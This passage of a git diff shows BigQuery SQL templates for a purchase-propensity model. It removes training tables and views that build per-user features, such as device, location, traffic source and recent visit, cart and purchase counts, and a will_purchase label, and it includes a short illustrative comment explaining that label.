`{{project_id}}.{{dataset}}.v_purchase_propensity_inference_15_7` -( - processed_timestamp, - feature_date, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day - ) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL {{expiration_duration_hours}} HOUR), - friendly_name="v_purchase_propensity_inference_15_7", - description="View Purchase Propensity Inference dataset using 15 days back to predict 7 days ahead. 
View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS -SELECT DISTINCT - processed_timestamp, - feature_date, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day -FROM ( -SELECT DISTINCT - processed_timestamp, - feature_date, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - -- Row number 
partitioned by user_pseudo_id and ordered by feature_date descending - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS user_row_order - FROM `{{project_id}}.{{dataset}}.purchase_propensity_inference_15_7` -) -WHERE - -- Filter for the most recent user example - user_row_order = 1; - - CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_inference_30_15` (processed_timestamp, feature_date, diff --git a/sql/procedure/purchase_propensity_training_preparation.sqlx b/sql/procedure/purchase_propensity_training_preparation.sqlx index e12ef6f8..a4e8f017 100644 --- a/sql/procedure/purchase_propensity_training_preparation.sqlx +++ b/sql/procedure/purchase_propensity_training_preparation.sqlx @@ -662,929 +662,8 @@ CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.purchase_propensity_training FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_full_dataset` ); - --- This is a table preparing rows for purchase propensity modelling looking back 15 days and looking ahead 15 days. -CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.purchase_propensity_training_15_15` AS( - SELECT DISTINCT - CURRENT_TIMESTAMP() AS processed_timestamp, - data_split, - feature_date, - user_pseudo_id, - LAST_VALUE(user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS user_id, - LAST_VALUE(user_ltv_revenue) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS user_ltv_revenue, - LAST_VALUE(device_category) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_category, - LAST_VALUE(device_mobile_brand_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_brand_name, - LAST_VALUE(device_mobile_model_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_model_name, - LAST_VALUE(device_os) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_os, - LAST_VALUE(device_language) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_language, - LAST_VALUE(device_web_browser) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_web_browser, - LAST_VALUE(geo_sub_continent) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_sub_continent, - LAST_VALUE(geo_country) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_country, - LAST_VALUE(geo_region) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_region, - LAST_VALUE(geo_city) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_city, - LAST_VALUE(geo_metro) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_metro, - LAST_VALUE(last_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_medium, - LAST_VALUE(last_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_name, - LAST_VALUE(last_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_source, - LAST_VALUE(first_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_medium, - LAST_VALUE(first_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS 
first_traffic_source_name, - LAST_VALUE(first_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_source, - LAST_VALUE(has_signed_in_with_user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS has_signed_in_with_user_id, - LAST_VALUE(active_users_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_1_day, - LAST_VALUE(active_users_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_2_day, - LAST_VALUE(active_users_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_3_day, - LAST_VALUE(active_users_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_4_day, - LAST_VALUE(active_users_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_5_day, - LAST_VALUE(active_users_past_6_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_6_day, - LAST_VALUE(active_users_past_7_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_7_day, - LAST_VALUE(active_users_past_8_14_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_8_14_day, - LAST_VALUE(purchases_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_1_day, - LAST_VALUE(purchases_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_2_day, - LAST_VALUE(purchases_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_3_day, - LAST_VALUE(purchases_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_4_day, - LAST_VALUE(purchases_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_5_day, - LAST_VALUE(purchases_past_6_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_6_day, - LAST_VALUE(purchases_past_7_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_7_day, - LAST_VALUE(purchases_past_8_14_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_8_14_day, - LAST_VALUE(visits_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_1_day, - LAST_VALUE(visits_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_2_day, - LAST_VALUE(visits_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_3_day, - LAST_VALUE(visits_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_4_day, - LAST_VALUE(visits_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_5_day, - LAST_VALUE(visits_past_6_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_6_day, - LAST_VALUE(visits_past_7_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_7_day, - LAST_VALUE(visits_past_8_14_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date 
DESC) AS visits_past_8_14_day, - LAST_VALUE(view_items_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_1_day, - LAST_VALUE(view_items_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_2_day, - LAST_VALUE(view_items_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_3_day, - LAST_VALUE(view_items_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_4_day, - LAST_VALUE(view_items_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_5_day, - LAST_VALUE(view_items_past_6_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_6_day, - LAST_VALUE(view_items_past_7_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_7_day, - LAST_VALUE(view_items_past_8_14_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_8_14_day, - LAST_VALUE(add_to_carts_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_1_day, - LAST_VALUE(add_to_carts_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_2_day, - LAST_VALUE(add_to_carts_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_3_day, - LAST_VALUE(add_to_carts_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_4_day, - LAST_VALUE(add_to_carts_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_5_day, - LAST_VALUE(add_to_carts_past_6_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_6_day, - LAST_VALUE(add_to_carts_past_7_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_7_day, - LAST_VALUE(add_to_carts_past_8_14_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_8_14_day, - LAST_VALUE(checkouts_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_1_day, - LAST_VALUE(checkouts_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_2_day, - LAST_VALUE(checkouts_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_3_day, - LAST_VALUE(checkouts_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_4_day, - LAST_VALUE(checkouts_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_5_day, - LAST_VALUE(checkouts_past_6_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_6_day, - LAST_VALUE(checkouts_past_7_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_7_day, - LAST_VALUE(checkouts_past_8_14_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_8_14_day, - -- Calculate the will purchase label. - -- Label for a purchase propensity model. It indicates whether a user made a purchase within the next 15 days based on their purchase history. 
- -- This label is then used to train a model that can predict the likelihood of future purchases for other users. - LAST_VALUE(CASE WHEN ( - purchase_day_1+ - purchase_day_2+ - purchase_day_3+ - purchase_day_4+ - purchase_day_5+ - purchase_day_6+ - purchase_day_7+ - purchase_day_8+ - purchase_day_9+ - purchase_day_10+ - purchase_day_11+ - purchase_day_12+ - purchase_day_13+ - purchase_day_14) = 0 THEN 0 ELSE 1 END) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) as will_purchase - FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_full_dataset` -); - --- This is a table preparing rows for purchase propensity modelling looking back 15 days and looking ahead 7 days. -CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.purchase_propensity_training_15_7` AS( - SELECT DISTINCT - CURRENT_TIMESTAMP() AS processed_timestamp, - data_split, - feature_date, - user_pseudo_id, - LAST_VALUE(user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS user_id, - LAST_VALUE(user_ltv_revenue) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS user_ltv_revenue, - LAST_VALUE(device_category) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_category, - LAST_VALUE(device_mobile_brand_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_brand_name, - LAST_VALUE(device_mobile_model_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_model_name, - LAST_VALUE(device_os) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_os, - LAST_VALUE(device_language) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_language, - LAST_VALUE(device_web_browser) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_web_browser, - LAST_VALUE(geo_sub_continent) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_sub_continent, - LAST_VALUE(geo_country) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_country, - LAST_VALUE(geo_region) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_region, - LAST_VALUE(geo_city) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_city, - LAST_VALUE(geo_metro) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_metro, - LAST_VALUE(last_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_medium, - LAST_VALUE(last_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_name, - LAST_VALUE(last_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_source, - LAST_VALUE(first_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_medium, - LAST_VALUE(first_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_name, - LAST_VALUE(first_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_source, - LAST_VALUE(has_signed_in_with_user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS has_signed_in_with_user_id, - 
LAST_VALUE(active_users_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_1_day, - LAST_VALUE(active_users_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_2_day, - LAST_VALUE(active_users_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_3_day, - LAST_VALUE(active_users_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_4_day, - LAST_VALUE(active_users_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_5_day, - LAST_VALUE(active_users_past_6_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_6_day, - LAST_VALUE(active_users_past_7_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_7_day, - LAST_VALUE(active_users_past_8_14_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_8_14_day, - LAST_VALUE(purchases_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_1_day, - LAST_VALUE(purchases_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_2_day, - LAST_VALUE(purchases_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_3_day, - LAST_VALUE(purchases_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_4_day, - LAST_VALUE(purchases_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_5_day, - LAST_VALUE(purchases_past_6_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_6_day, - LAST_VALUE(purchases_past_7_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_7_day, - LAST_VALUE(purchases_past_8_14_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_8_14_day, - LAST_VALUE(visits_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_1_day, - LAST_VALUE(visits_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_2_day, - LAST_VALUE(visits_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_3_day, - LAST_VALUE(visits_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_4_day, - LAST_VALUE(visits_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_5_day, - LAST_VALUE(visits_past_6_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_6_day, - LAST_VALUE(visits_past_7_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_7_day, - LAST_VALUE(visits_past_8_14_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_8_14_day, - LAST_VALUE(view_items_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_1_day, - LAST_VALUE(view_items_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_2_day, - 
LAST_VALUE(view_items_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_3_day, - LAST_VALUE(view_items_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_4_day, - LAST_VALUE(view_items_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_5_day, - LAST_VALUE(view_items_past_6_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_6_day, - LAST_VALUE(view_items_past_7_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_7_day, - LAST_VALUE(view_items_past_8_14_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_8_14_day, - LAST_VALUE(add_to_carts_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_1_day, - LAST_VALUE(add_to_carts_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_2_day, - LAST_VALUE(add_to_carts_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_3_day, - LAST_VALUE(add_to_carts_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_4_day, - LAST_VALUE(add_to_carts_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_5_day, - LAST_VALUE(add_to_carts_past_6_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_6_day, - LAST_VALUE(add_to_carts_past_7_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_7_day, - LAST_VALUE(add_to_carts_past_8_14_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_8_14_day, - LAST_VALUE(checkouts_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_1_day, - LAST_VALUE(checkouts_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_2_day, - LAST_VALUE(checkouts_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_3_day, - LAST_VALUE(checkouts_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_4_day, - LAST_VALUE(checkouts_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_5_day, - LAST_VALUE(checkouts_past_6_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_6_day, - LAST_VALUE(checkouts_past_7_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_7_day, - LAST_VALUE(checkouts_past_8_14_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_8_14_day, - -- Calculate the will purchase label. - -- Label for a purchase propensity model. It indicates whether a user made a purchase within the next 7 days based on their purchase history. - -- This label is then used to train a model that can predict the likelihood of future purchases for other users. 
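-- Illustrative aside, not part of this template: a minimal, runnable sketch of the
-- labelling rule described in the comment above. The label is 1 when any purchase
-- falls inside the future window (7 or 15 days, depending on the table), otherwise 0.
-- The `toy_future_purchases` CTE and its three purchase_day_N columns are hypothetical
-- stand-ins for the purchase_day_* columns of purchase_propensity_training_full_dataset.
WITH toy_future_purchases AS (
  SELECT 'userA' AS user_pseudo_id, 0 AS purchase_day_1, 2 AS purchase_day_2, 0 AS purchase_day_3 UNION ALL
  SELECT 'userB', 0, 0, 0
)
SELECT
  user_pseudo_id,
  -- Any non-zero sum of daily purchase counts over the future window means "will purchase".
  CASE WHEN (purchase_day_1 + purchase_day_2 + purchase_day_3) = 0 THEN 0 ELSE 1 END AS will_purchase
FROM toy_future_purchases;
-- Expected result: userA -> 1, userB -> 0.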
- LAST_VALUE(CASE WHEN ( - purchase_day_1+ - purchase_day_2+ - purchase_day_3+ - purchase_day_4+ - purchase_day_5+ - purchase_day_6+ - purchase_day_7) = 0 THEN 0 ELSE 1 END) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) as will_purchase - FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_full_dataset` -); - --- This is a view preparing rows for purchase propensity modelling looking back 15 days and looking ahead 15 days. -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_15_15` -(processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - will_purchase) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), - friendly_name="v_purchase_propensity_training_15_15", - description="View Purchase Propensity Training dataset using 15 days back to predict 15 days ahead. 
